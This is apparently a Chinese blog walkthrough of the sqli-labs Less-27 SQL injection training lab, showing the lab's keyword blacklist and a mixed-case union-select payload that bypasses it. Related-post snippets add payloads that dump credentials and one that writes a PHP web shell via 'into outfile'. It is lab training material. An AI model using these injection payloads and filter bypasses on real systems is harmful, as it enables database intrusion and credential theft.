sqli-labs ————less -27(union、SELECT、绕过滤)

最新推荐文章于 2024-08-25 14:14:12 发布
最新推荐文章于 2024-08-25 14:14:12 发布
阅读量1.9k 收藏
点赞数
分类专栏: 【渗透测试实战】 # Sqli-labs实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80286188
版权

Less-27

从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:
SQL语句:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
过滤机制: 
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

从SQL语句中我们可以发现id参数被单引号包裹,我们如果要构造SQL语句就需要闭合前面的单引号,同时在过滤机制中我们发最常用的select、union也被过滤了,那么我们现在来看看如何绕过:

大小写:Union\SelecT等等
绕过的字符串组合:UNinUNIONon

下面做一个简单的测试:

payload:http://192.168.11.136/sqli-labs/Less-27?id=-1'unIon%a0SelEcT%a01,database(),3||'1


sqli-labs通关笔记
m0_55563900的博客
04-04 4578
32关 宽字节注入 正常思路 输入’ " 等等一些特殊符号 输入单引号之后出现了转义,把单引号转义成’,所以要用GBK编码 %df+’ 字段数为3列,然后使用联合查询就可以了
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1564
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs Less25-28 过滤函数对字符的过滤 - GET
kevinhanser
08-10 541
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR & AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...
SQLi-LABS通关攻略【26-30关】
最新发布
qq_65852138的博客
08-25 737
SQLi-LABS通关攻略【26-30关】
sqli-labs/Less-27
m0_71299382的博客
11-20 418
sqli-labs第二十七关
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
sqlilabs less-27~27a
TA不懒,但还没有添加简介
07-20 318
sqlilabs less-27~27a
Sqli-labs之Less-27和Less-27a
m0_46315342的博客
06-04 310
                                          &nbs...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 831
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
SQLI-LABS Less-7 到 Less-8
Web学习之路
03-20 315
布尔盲注
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1760
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
Sqli-labs less 27
weixin_34345753的博客
08-11 180
Less-27 本关主要考察将unionselect和26关过滤掉的字符。此处我们依旧和26关的方式是一样的,只需要将unionselect改为大小写混合就可以突破。 示例:127.0.0.1/sqllib/Less-27/?id=100'unIon%a0SelEcT%a01,database(),3||'1 TIPS:uniunionon也是可以突破限制的。亦可以利用报错注入和延时注入...
sqli-labs(27)
weixin_30901729的博客
05-28 458
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select过滤了 /?id=1'%0Aunion%0Asel...
Sqlilabs-27
KAKA的博客
07-14 842
题目告诉我们本关卡过滤unionselect,其实还有空格,这一关也过滤了 尝试双写过,不行 那就大小写过,成功 –查表 http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1 –查列 http://s.
SQLi-LABS Less-27到Less-28a
m0_64898960的博客
04-29 187
Less-27题目 经过测试发现需要“ ’ ”进行闭合… 尝试猜字段,发现除了空格和注释符,一些内容好像又可以用了,如or… 不能使用unionselect 我们可以通过间接大小写来达到或者像union里面再塞一个union来达到过的效果… 开始爆数据库 这里使用了-1发现“ - ”好像被过滤了,改为100 下面的注入照常,只要注意一下unionselect的输入即可 Less-27a题目 测试出闭合条件“ " ” 经过尝试,没有报错的回显…可以用题目说的盲注也可以大小写union和sel
sqli-labs第27关,27a关
weixin_46023655的博客
07-30 586
sqli-labs第2727a关
Sqli-Labs做题笔记:Less-27 - Less-31
Forever_Han13的博客
01-24 1697
Less-27: http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00 Less-27a http://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值